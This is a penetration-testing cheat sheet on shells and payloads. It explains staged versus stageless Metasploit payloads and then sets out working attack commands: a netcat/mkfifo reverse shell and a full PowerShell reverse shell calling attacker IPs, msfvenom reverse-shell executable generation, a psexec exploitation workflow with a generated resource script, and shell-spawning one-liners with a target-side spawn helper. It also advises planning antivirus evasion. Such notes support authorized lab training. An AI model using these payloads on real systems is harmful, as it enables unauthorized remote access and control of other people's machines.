Shells & Payloads: Payloads Overview
Types of Payloads
Staged Payloads
Sends a small stager first; the stager then pulls the main stage from the handler and runs it in memory
Keeps the initial footprint small (useful when the exploit leaves little room) but depends on a second, reliable connection back to the attacker
Example naming (stage and stager separated by "/"):
windows/meterpreter/reverse_tcp
Stageless Payloads
Entire payload sent at once; no second callback to the handler
Larger single transfer but self-contained, so better on low-bandwidth or unreliable links and quieter on the wire
Example naming (stage and stager joined by "_"):
windows/meterpreter_reverse_tcp
Essential Payload Commands
Netcat/Bash Reverse Shell
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
PowerShell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"
MSFvenom Payload Generation
List Available Payloads
msfvenom -l payloads
Linux Payload Creation
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
Windows Payload Creation
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
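Added example covering both the naming rule under Types of Payloads and the msfvenom commands above; it is not part of the original notes. The functions classify a payload name by its separator, derive the staged or stageless sibling, and print the msfvenom command together with the exploit/multi/handler listener that must match it. The STAGES list is a hand-picked subset of Metasploit stage names, and the addresses and file names are placeholders.

```sh
#!/bin/sh
# Added example, not part of the original notes: encode the naming rule
# (stage "/" stager = staged, stage "_" stager = stageless) as shell functions,
# derive the sibling name, and build the matching msfvenom and multi/handler
# commands. STAGES is a hand-picked subset of Metasploit stage names
# (assumption); the addresses and file names are placeholders.

STAGES="shell meterpreter vncinject dllinject powershell"

is_stage() {
  for s in $STAGES; do
    [ "$1" = "$s" ] && return 0
  done
  return 1
}

# payload_kind NAME -> prints "staged" or "stageless"
payload_kind() {
  name=$1; last=${name##*/}; rest=${name%/*}; prev=${rest##*/}
  [ "$rest" = "$name" ] && prev=""      # single-component name: nothing before it
  if is_stage "$prev"; then
    echo staged
  else
    echo stageless   # covers <stage>_<stager> names and plain singles like windows/exec
  fi
}

# to_stageless NAME: windows/meterpreter/reverse_tcp -> windows/meterpreter_reverse_tcp
to_stageless() {
  name=$1
  if [ "$(payload_kind "$name")" = stageless ]; then echo "$name"; return 0; fi
  last=${name##*/}; rest=${name%/*}; prev=${rest##*/}; base=${rest%/*}
  if [ "$base" = "$rest" ]; then echo "${prev}_${last}"; else echo "${base}/${prev}_${last}"; fi
}

# to_staged NAME: linux/x64/shell_reverse_tcp -> linux/x64/shell/reverse_tcp;
# a name with no embedded stage (windows/exec, cmd/unix/reverse_bash) is returned unchanged
to_staged() {
  name=$1; last=${name##*/}; rest=${name%/*}
  for s in $STAGES; do
    case $last in
      "${s}_"*) echo "${rest}/${s}/${last#"${s}_"}"; return 0 ;;
    esac
  done
  echo "$name"
}

# msfvenom_cmd NAME LHOST LPORT FORMAT OUTFILE -> the generation command
msfvenom_cmd() {
  echo "msfvenom -p $1 LHOST=$2 LPORT=$3 -f $4 -o $5"
}

# handler_cmd NAME LHOST LPORT -> the listener; PAYLOAD must match the generated
# payload exactly: a staged payload needs the staged handler and vice versa
handler_cmd() {
  echo "msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD $1; set LHOST $2; set LPORT $3; run'"
}

for p in windows/meterpreter/reverse_tcp windows/meterpreter_reverse_tcp windows/exec; do
  printf '%-36s %s\n' "$p" "$(payload_kind "$p")"
done
msfvenom_cmd "$(to_stageless linux/x64/shell/reverse_tcp)" 10.10.14.12 7777 elf payload.elf
handler_cmd linux/x64/shell_reverse_tcp 10.10.14.12 7777
```

For the non-Metasploit shells on this page (the Netcat and PowerShell one-liners) the listener is simply nc -lvnp <port> on the attack host; the handler command above is only needed for msfvenom-generated payloads, and mixing a staged payload with a stageless handler (or the reverse) is the usual reason a callback connects and then dies.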
Windows System Infiltration
Fingerprinting Windows Hosts
TTL Check via Ping
ping <target_ip> # Windows replies with TTL=128 by default (32 on Windows 9x-era hosts); Linux uses 64. Each router hop decrements the value by one, so TTL=127 or 126 still points to Windows
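Added example, not part of the original notes: the TTL rule of thumb as a check that accounts for hop decrement, run over two constructed ping replies (no host was pinged). Defaults assumed are 64 for Linux/Unix, 128 for Windows and 255 for Solaris/AIX and most network devices.

```sh
#!/bin/sh
# Added example, not part of the original notes: turn the TTL rule of thumb into
# a check. Default initial TTLs are 64 (Linux/Unix), 128 (Windows) and 255
# (Solaris/AIX, most network devices); each router hop subtracts one, so the
# observed value is rounded up to the next default rather than matched exactly.
# The sample replies below are constructed; no host was pinged.

# guess_os_from_ttl TTL -> likely OS family
guess_os_from_ttl() {
  ttl=$1
  case $ttl in
    ''|*[!0-9]*) echo unknown; return 0 ;;
  esac
  if   [ "$ttl" -gt 128 ]; then echo "solaris/aix/network device"
  elif [ "$ttl" -gt 64 ];  then echo windows
  elif [ "$ttl" -gt 32 ];  then echo "linux/unix"
  else echo "ambiguous: legacy windows (initial TTL 32) or a unix host many hops away"
  fi
}

# ttl_from_ping LINE -> the number after ttl= / TTL= (Linux and Windows ping output)
ttl_from_ping() {
  printf '%s\n' "$1" | sed -n 's/.*[tT][tT][lL]=\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# constructed: Linux ping of a Windows host one hop away, and Windows ping of a Linux host
SAMPLE_REPLY_A="64 bytes from 10.129.201.97: icmp_seq=1 ttl=127 time=12.3 ms"
SAMPLE_REPLY_B="Reply from 10.129.201.98: bytes=32 time=4ms TTL=63"
for reply in "$SAMPLE_REPLY_A" "$SAMPLE_REPLY_B"; do
  t=$(ttl_from_ping "$reply")
  printf 'ttl=%s -> %s\n' "$t" "$(guess_os_from_ttl "$t")"
done
```

TTL is only a hint: hosts can change their default, and load balancers or proxies answer with their own stack, so confirm with the nmap OS detection below before relying on it.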
Nmap OS Detection
sudo nmap -v -O <target_ip>    # OS detection only
sudo nmap -v -A <target_ip>    # Aggressive scan: OS detection, version detection, default scripts, traceroute
Key Windows Ports
139, 445: NetBIOS session service / SMB over TCP
135: MSRPC endpoint mapper
443: HTTPS (not Windows-specific, but often IIS)
Common Windows Payloads
DLLs: loaded into a trusted process (DLL hijacking, sideloading); common in privilege escalation and UAC bypass
Batch Files (.bat): Automation scripts
VBScript (.vbs): Client-side automation
MSI Files: Installation packages
PowerShell Scripts: System automation and exploitation
Metasploit Attack Workflow
# Start Metasploit
sudo msfconsole
# Search for exploit
search smb
# Configure exploit
use <exploit_number_or_path> # e.g. exploit/windows/smb/psexec, which takes the SHARE/SMBUser/SMBPass options below
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>
# Execute
exploit
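Added example, not part of the original notes: the same workflow written out as a Metasploit resource script so the run is repeatable, reviewable and logged instead of typed by hand. Module and option names are those of exploit/windows/smb/psexec; the host, credentials and ports are placeholders, not real targets.

```sh
#!/bin/sh
# Added example, not part of the original notes: the psexec workflow as a
# Metasploit resource script, launched with msfconsole -q -r. Module and option
# names are those of exploit/windows/smb/psexec; hosts, credentials and ports
# below are placeholders (assumption), not real targets.

# write_psexec_rc OUTFILE RHOST USER PASS LHOST LPORT
write_psexec_rc() {
  out=$1 rhost=$2 user=$3 pass=$4 lhost=$5 lport=$6
  for v in "$rhost" "$user" "$pass" "$lhost"; do
    [ -n "$v" ] || { echo "write_psexec_rc: empty argument" >&2; return 1; }
  done
  case $lport in
    ''|*[!0-9]*) echo "write_psexec_rc: bad LPORT '$lport'" >&2; return 1 ;;
  esac
  if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
    echo "write_psexec_rc: LPORT out of range: $lport" >&2; return 1
  fi
  # ADMIN\$ keeps the literal $ through the unquoted heredoc; spool logs the
  # console output next to the script for the engagement notes
  cat > "$out" <<EOF
use exploit/windows/smb/psexec
set RHOSTS $rhost
set SHARE ADMIN\$
set SMBUser $user
set SMBPass $pass
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
spool ${out%.rc}.log
exploit -j
EOF
}

RC="${TMPDIR:-/tmp}/psexec.rc"
write_psexec_rc "$RC" 10.129.201.97 administrator 'Passw0rd!' 10.10.14.12 4444
echo "written $RC; run with: sudo msfconsole -q -r $RC"
```

exploit -j backgrounds the session as a job so the console stays usable; the script and its spool log are the record of what was run against which host, which is what the documentation points under Best Practices ask for.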
Linux System Infiltration
Pre-Exploitation Checklist
Interactive Shell Spawning Methods
Python TTY Shell
python -c 'import pty; pty.spawn("/bin/sh")'
Basic Shell Spawning
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh";'
lua -e 'os.execute("/bin/sh")'
awk 'BEGIN {system("/bin/sh")}'
VIM Shell Escape
vim -c ':!/bin/sh'
# Or from inside VIM:
:set shell=/bin/sh
:shell
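Added example, not part of the original notes: on a target where you only have a dumb shell, check which of the interpreters listed above are actually installed and print the matching spawn command, best option first. The command table is the one above; the preference order (python first, because pty.spawn gives a real pseudo-terminal) is an assumption of mine.

```sh
#!/bin/sh
# Added example, not part of the original notes: list the spawn commands whose
# interpreter exists on this host, best option first. The commands are the ones
# from the notes above; the preference order is mine (assumption).

# spawn_candidates -> one ready-to-paste spawn command per installed interpreter
spawn_candidates() {
  for bin in python3 python perl ruby lua awk vim; do
    command -v "$bin" >/dev/null 2>&1 || continue
    case $bin in
      python3|python) echo "$bin -c 'import pty; pty.spawn(\"/bin/sh\")'" ;;
      perl) echo "perl -e 'exec \"/bin/sh\";'" ;;
      ruby) echo "ruby -e 'exec \"/bin/sh\";'" ;;
      lua)  echo "lua -e 'os.execute(\"/bin/sh\")'" ;;
      awk)  echo "awk 'BEGIN {system(\"/bin/sh\")}'" ;;
      vim)  echo "vim -c ':!/bin/sh'" ;;
    esac
  done
}

# first_spawn -> the best available option, or the bare interactive sh fallback
first_spawn() {
  first=$(spawn_candidates | head -n 1)
  if [ -n "$first" ]; then echo "$first"; else echo "/bin/sh -i"; fi
}

echo "available on this host:"
spawn_candidates
echo "use: $(first_spawn)"
```

Only the python route gives a real pty; to finish upgrading it, press Ctrl-Z to background the shell, run stty raw -echo; fg on the attack host, then export TERM=xterm and stty rows <n> columns <m> in the target shell so that tab completion, Ctrl-C and full-screen tools behave.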
Permission Checks
# File permissions
ls -la <path/to/file>
# Sudo permissions
sudo -l
Best Practices
Pre-Exploitation
Always perform thorough reconnaissance
Document all findings and attempted exploits
Verify target scope and permissions
Post-Exploitation
Maintain access securely
Document all changes made to the system
Clean up after testing is complete
Security Considerations
Choose staged vs stageless deliberately: stageless is the single-transfer, self-contained option; staged keeps the first stage small but depends on the second download succeeding
Expect unmodified msfvenom output to be flagged by antivirus; plan evasion before the engagement (encoders alone rarely suffice)
Prefer encrypted transports (e.g. the reverse_https variants) over plain reverse_tcp where possible; a cleartext shell exposes every command and its output to anyone on the path